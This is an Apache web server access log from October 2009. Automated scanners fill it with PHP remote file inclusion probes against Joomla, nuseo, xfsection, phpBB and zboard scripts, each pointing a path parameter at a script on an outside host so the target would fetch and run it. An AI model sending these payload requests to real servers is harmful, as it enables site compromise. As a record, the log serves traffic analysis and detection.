61.135.134.109 - - [06/Oct/2009:02:41:49 -0400] "GET /logs/access_log.Q109052600%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:02:41:50 -0400] "GET /logs/access_log.Q109091100%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:42:05 -0400] "GET /logs/access_log.Q109091100%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:42:05 -0400] "GET /logs/access_log.Q109052600%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:02:42:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.234.19.49 - - [06/Oct/2009:02:42:41 -0400] "GET /logs/access_log.Q109071400%20%20/modules/My_eGallery/public/displayCategory.php?basepath=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:42:45 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:42:45 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:42:51 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
193.4.113.98 - - [06/Oct/2009:02:43:43 -0400] "GET /logs/access_log.Q109091100/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:43:43 -0400] "GET /logs/access_log.Q109091100/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:43:43 -0400] "GET /logs/access_log.Q109091100/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:43:43 -0400] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:43:43 -0400] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:43:43 -0400] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:43:44 -0400] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:43:44 -0400] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:43:44 -0400] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:43:44 -0400] "GET /logs/access_log.Q109052600/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:43:44 -0400] "GET /logs/access_log.Q109052600/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:43:44 -0400] "GET /logs/access_log.Q109052600/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:45:08 -0400] "GET /logs/access_log.Q109082500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:45:08 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:45:08 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:45:08 -0400] "GET /logs/access_log.Q109082500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:45:09 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:45:09 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:45:27 -0400] "GET /logs/access_log.Q109082500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:45:28 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:45:28 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
174.143.3.188 - - [06/Oct/2009:02:45:35 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
174.143.3.188 - - [06/Oct/2009:02:45:35 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
174.143.3.188 - - [06/Oct/2009:02:45:35 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.143.3.188 - - [06/Oct/2009:02:45:36 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
193.4.113.98 - - [06/Oct/2009:02:45:42 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:45:43 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:45:53 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
83.138.48.14 - - [06/Oct/2009:02:46:01 -0400] "GET /logs/access_log.Q109053100/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.185.129.36 - - [06/Oct/2009:02:46:16 -0400] "GET /index.php?go=http://omasol.free.fr/whois?%0D? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
203.185.129.36 - - [06/Oct/2009:02:46:16 -0400] "GET /logs/index.php?go=http://omasol.free.fr/whois?%0D? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
203.185.129.36 - - [06/Oct/2009:02:46:16 -0400] "GET /logs/error_log.Q109082100/index.php?go=http://omasol.free.fr/whois?%0D? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
220.125.237.35 - - [06/Oct/2009:02:46:45 -0400] "GET //cyber.php?act=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:02:46:55 -0400] "GET /logs//cyber.php?act=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:02:46:55 -0400] "GET /logs/error_log.Q109062300//cyber.php?act=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:02:47:29 -0400] "GET /logs/access_log.Q109062300//cyber.php?act=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:02:48:18 -0400] "GET /logs/access_log.Q109070800%20%20//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:02:48:20 -0400] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:02:48:20 -0400] "GET /logs/access_log.Q109080400%20%20//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:02:48:18 -0400] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:48:35 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:48:35 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:48:38 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:48:51 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:48:51 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:48:51 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:49:23 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:49:23 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:49:28 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.120 - - [06/Oct/2009:02:49:45 -0400] "GET //modules/errors.php?error=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
78.110.50.120 - - [06/Oct/2009:02:49:45 -0400] "GET /logs/access_log.Q109080200//modules/errors.php?error=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
78.110.50.120 - - [06/Oct/2009:02:49:45 -0400] "GET /logs//modules/errors.php?error=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
78.110.50.120 - - [06/Oct/2009:02:50:01 -0400] "GET /logs/error_log.Q109080200//modules/errors.php?error=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
220.125.237.35 - - [06/Oct/2009:02:50:16 -0400] "GET /logs/access_log.Q109062300%20%20//cyber.php?act=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [06/Oct/2009:02:51:13 -0400] "GET /logs/access_log.Q109071200%20%20//?_zb_path=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.11.145.8 - - [06/Oct/2009:02:52:36 -0400] "GET /logs/access_log.Q109071200%20%20//?_zb_path=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:02:53:01 -0400] "GET /logs//cyber.php?act=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:02:53:01 -0400] "GET //cyber.php?act=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:02:53:05 -0400] "GET /logs/error_log.Q109072900 HTTP/1.0" 200 2278245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.4.113.98 - - [06/Oct/2009:02:53:08 -0400] "GET /logs/access_log.Q109053000/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:53:08 -0400] "GET /logs/access_log.Q109053000/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:53:09 -0400] "GET /dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:53:09 -0400] "GET /dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:53:09 -0400] "GET /logs/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:53:09 -0400] "GET /logs/access_log.Q109053000/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:53:09 -0400] "GET /logs/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:53:10 -0400] "GET /logs/access_log.Q109052500/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:53:10 -0400] "GET /dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:53:10 -0400] "GET /logs/access_log.Q109052500/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:53:10 -0400] "GET /logs/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:02:53:11 -0400] "GET /logs/access_log.Q109052500/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
72.11.145.8 - - [06/Oct/2009:02:53:23 -0400] "GET /logs/access_log.Q109072900%20%20//?_zb_path=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.11.145.8 - - [06/Oct/2009:02:53:23 -0400] "GET //?_zb_path=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.11.145.8 - - [06/Oct/2009:02:53:23 -0400] "GET /logs//?_zb_path=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:02:53:30 -0400] "GET /logs/access_log.Q109062300//cyber.php?act=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:54:16 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:54:16 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:54:16 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:02:53:07 -0400] "GET /logs/error_log.Q109072900 HTTP/1.0" 200 2278245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.75.81 - - [06/Oct/2009:02:54:30 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:54:30 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:54:30 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:55:30 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:55:30 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:02:55:30 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:55:47 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:55:47 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:55:47 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:55:47 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:55:47 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:55:47 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:55:47 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:55:47 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
